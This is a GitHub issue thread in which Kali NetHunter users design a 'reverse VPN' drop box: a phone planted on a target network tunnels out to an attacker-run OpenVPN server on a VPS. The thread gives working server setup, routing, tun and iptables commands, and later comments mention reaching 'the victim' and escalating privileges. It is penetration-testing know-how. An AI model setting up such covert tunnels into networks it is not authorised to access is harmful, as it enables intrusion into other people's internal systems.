### ISSUE TITLE
NetHunter of DOOM

### ISSUE THREAD

**Issue by vay3t** [offensive-security/kali-nethunter#421]
Talking with a friend, we came out with an interesting idea. To implement the NetHunter of DOOM. A lot of times when we are working in the field we need additional tools apart from what we use in NetHunter. Sometimes we are short of power, be it because of the CPU or GPU. An alternative would be using it in an RPi, but from a cellphone with a reverse VPN it would be way much easier.

**Comment by binkybear** [comment]
That sounds like a nice idea (similar to a Hak5 turtle).  I've been researching/experimenting with running openvpn inside chroot and it doesn't work.  But I already had a feeling it wouldn't since Android used a separate routing table for VPN usage.

From chroot using an ovpn file on the sdcard I was able to get openvpn working:
```bash
# Do once
mkdir -p /data/local/tmp

# Run ovpn config file
openvpn --config test.ovpn

######## Now in new terminal run this

# Set gateway
ip route replace default via 192.168.1.1 dev wlan0

# Add
ip rule add from 192.168.1.0/24 lookup 61
ip route add default dev tun0 scope link table 61
ip route add 192.168.1.0/24 dev wlan0 scope link table 61
ip route add broadcast 255.255.255.255 dev wlan0 scope link table 61
```
This is assuming gateway and private ip range is the same and also using wifi.  I will continue to research getting a reverse vpn working as well as automating it.

**Comment by binkybear** [comment]
I was able to get it working (thanks to Hak5 video and some Android tweaking).  I wrote down all the steps as a reference:

## Guide VPN

This guide is pretty much a copy of the Hak5 episode:

http://hak5.org/episodes/hak5-1921-access-internal-networks-with-reverse-vpn-connections

I highly recommend you watch that if you are unfamilar with reverse vpns or needs a visual guide.  The only difference is instead of a turtle will be using Nethunter as our access into the network.

## Awesome Expert Diagram

```bash
 ------------    Port 443         ------------        ------------
| NetHunter  |<----------------> |  OpenVPN   |<-----| Additional |      
|			 |					 |            |      |            |
|  Target    |                   |   Server   |      |  Attacker  |
 ------------                     ------------        ------------
192.168.1.0/24                 https://vpnserver        Anywhere
(nethunter.ovpn)                       				  (artemis.ovpn)
```

## Setup your OpenVPN (using a VPS)

On your VPS or your internet facing device you want to be your OpenVPN server:

```bash
# This download was for 64bit Ubuntu 14 server
wget http://swupdate.openvpn.org/as/openvpn-as-2.0.25-Ubuntu14.amd_64.deb
dpkg -i openvpn-as-2*
openvpn passwd
[enter pass]
/usr/local/openvpn_as/bin/ovpn-init
[DELETE][ENTER]

Will this be the primary Access Server node?
(enter 'no' to configure as a backup or standby node)
> Press ENTER for default [yes]: yes

Please enter the option number from the list above (1-3).
> Press Enter for default [2]: 1

Please specify the port number for the Admin Web UI.
> Press ENTER for default [943]: 

Please specify the TCP port number for the OpenVPN Daemon
> Press ENTER for default [443]: 

Should client traffic be routed by default through the VPN?
> Press ENTER for default [yes]: 

Should client DNS traffic be routed by default through the VPN?
> Press ENTER for default [yes]: 

Use local authentication via internal DB?
> Press ENTER for default [no]: yes

You can login to the Admin Web UI as "openvpn" or specify
a different user account to use for this purpose.

Do you wish to login to the Admin UI as "openvpn"?
> Press ENTER for default [yes]: 


Visit admin website: https://vpnurl/admin

Login: openvpn
Password: [whatever you set it to earlier]

User Management
	User Permissions
		New Username: artemis
		"click show"
		Allow Auto-login
		Local Password: [set password]

		Save Settings

		New Username: nethunter
		"click show"
		Local Password: [set password]
		Allow Auto-login
		Allow Access From: all server-side private subnet
		Allow Access From: all other VPN clients
		VPN Gateway
			Yes
				192.168.1.0/24
		Save Settings
		Update Running Server

```bash

Visit website: https://[vpnurl]

Login with Username/password for both accounts

Download both client.ovpn autologin profiles.  It's easier to rename to:

nethunter_client.ovpn  < --THIS GOES ON NETHUNTER DEVICE
artemis_client.ovpn  <-- THIS GOES ON OTHER CLIENT 


## In Nethunter Terminal

```bash
# Do once
mkdir -p /data/local/tmp

# Set gateway
ip route replace default via 192.168.1.1 dev wlan0

# Run ovpn config file
openvpn --config /sdcard/nethunter.ovpn

# Add
ip rule add from 192.168.1.0/24 lookup 61
ip route add default dev tun0 scope link table 61
ip route add 192.168.1.0/24 dev wlan0 scope link table 61
ip route add broadcast 255.255.255.255 dev wlan0 scope link table 61
```

## On Client (Attacker) Device

Using openvpn client of your choice, load the ovpn file: artemis_client.ovpn (or whatever you called it)

Connect to vpn.

You can now access the 192.168.1.0/24 network


## Conclusion

In my testing I used Nethunter on a home network connect a to VPN being hosted on a VPS.  The "attacker" machine was just another Android phone with OpenVPN installed and it was connecting through a cell data connection.  It was able to ping the Nethunter device and all devices on the 192.168.1.0/24.

**Comment by lxj616** [comment]
@binkybear Thank you for the tutorial, but could you share your final openvpn config files (both server and two clients)? I had trouble using openvpn-as frontend and failed lots of times

And I find on nethunter you don't get a tun by default, do the following first:

mkdir -p /dev/net
mknod /dev/net/tun c 10 200
chmod 600 /dev/net/tun
cat /dev/net/tun

**Comment by lxj616** [comment]
Well, I managed to accomplish this somehow, I'll write up a detailed guide using original openvpn configurations

In short, my key steps are:

#Configure this in ccd target profile:
iroute 192.168.4.0 255.255.255.0

#on server side
route 192.168.4.0 255.255.255.0
client-to-client
push "route 192.168.4.0 255.255.255.0"

#finally don't forget, or you will not receive response
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o wlan0 -j MASQUERADE

**Comment by bkr32** [comment]
does http://swupdate.openvpn.org/as/ load for anyone? keep getting 403 forbidden

**Comment by vay3t** [comment]
That's recent. u can download in https://openvpn.net/index.php/access-server/download-openvpn-as-sw.html

**Comment by bkr32** [comment]
thanks for that @vay3t

**Comment by bkr32** [comment]
ip route add 192.168.1.0/24 dev wlan0 scope link table 61 returns RTNETLINK answers:invalid argument, and i seem to have gone wrong somewhere, nethunter connection keeps looking for internal ip 192.168.0.17:443 when i'm in another network

**Comment by vay3t** [comment]
What is your version of android?

**Comment by bkr32** [comment]
android M

**Comment by binkybear** [comment]
I've started a script to help process using OpenVPN server (not AS).  If you would like to modify it/help with creation:

https://github.com/binkybear/rock3tman

**Comment by akrolla** [comment]
You could also build the iso of doom from kali.org and load it with drivedroid.

**Comment by akrolla** [comment]
And probably can  build it on your phone also. Make sure u have proper packages . I built the .iso on kali and put in images file that drive droid reads from

**Comment by akrolla** [comment]
And just download the client certificates to your phone so your NH could connect to the kali instances VPN along with the victim. Heck u could build it all on ur phone probably and not even have to do that

**Comment by bkr32** [comment]
And probably make one post for everything you want to say @akrolla building it on phone will take too long and is not the best way to go

**Comment by akrolla** [comment]
Yea I shoulda edited . Sorry i was thinking about it after I posted in the
github app and just wrote it as I was thinking it. I built it in kali and
transferred it to the phone and just run the server on kali and ssh in thru
the phone to kali to access the vpn server, I haven't tested it in the wild
it would save significant space doing it this way.

**Comment by bkr32** [comment]
I'll make a post about building a ISO and having encrypted partition later on tonight

**Comment by akrolla** [comment]
Sounds good. I'm going to test the drivedroid method as soon as I get my
computer back from hp . let us know how it goes! As will I as soon as they
hurry up and send it back.

**Comment by vay3t** [comment]
@akrolla  the idea of doing a reverse vpn with nethunter is to avoid using an iso, you do not always have a pc. nethunter of doom is in honor of this method: https://www.offensive-security.com/kali-linux/kali-rolling-iso-of-doom/ if you want you could contribute with some documentation about your method.

@bkr32 I'm interested in reading it. please leave a link in this thread, so people can learn to make variants of this attack.

**Comment by akrolla** [comment]
You may not always havea computer handy like me right now, yet I have
access to the iso via cloud. And download it and use it when necessary id
imagine its ten times faster than creating it on the phone but I suppose
its good training to be able to do it on the fly on the phone I'm
definitely interested just thinking about efficiency and accesibility over
functionality that is whwre I'm thinking from. While you are busy buildong
it on the phone id already have downloaded it and deployed it before you
are probably finished setting it up. I didit a while ago the kali
instructions are a little off and I had to modify rhem slightly to get them
to work ill have to find where I wrote down the workaround.

**Comment by akrolla** [comment]
I understand I just feel why not use the tools handy included in nh., nh is
the hand to the long arm of kali so it only makes sense to use nh
syergistically. Id imagine you could get the ca.crt and other certs you
need when compiling the iso  for the open vpn and add the proper ones to
the phone to directly access the vpn of the victim thus getting you a shell
in which you can escalate privileges

On Sep 25, 2016 3:09 AM, "Vay3t" <notifications@github.com> wrote:

@akrolla <https://github.com/akrolla> the idea of doing a reverse vpn with
nethunter is to avoid using an iso, you do not always have a pc. nethunter
of doom is in honor of this method: https://www.offensive-
security.com/kali-linux/kali-rolling-iso-of-doom/ if you want you could
contribute with some documentation about your method.

@bkr32 <https://github.com/bkr32> I'm interested in reading it. please
leave a link in this thread, so people can learn to make variants of this
attack.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<https://github.com/offensive-security/kali-nethunter/issues/421#issuecomment-249408896>,
or mute the thread

**Comment by bkr32** [comment]
https://github.com/offensive-security/kali-nethunter/issues/595

**Comment by akrolla** [comment]
Itshould probably be noted if you want to access the Iso on the victim
machine via vpn on another machine other than the one you generated the ISO
withyou need to copy the security certs into NH or whatever else you will
use to access the victim.
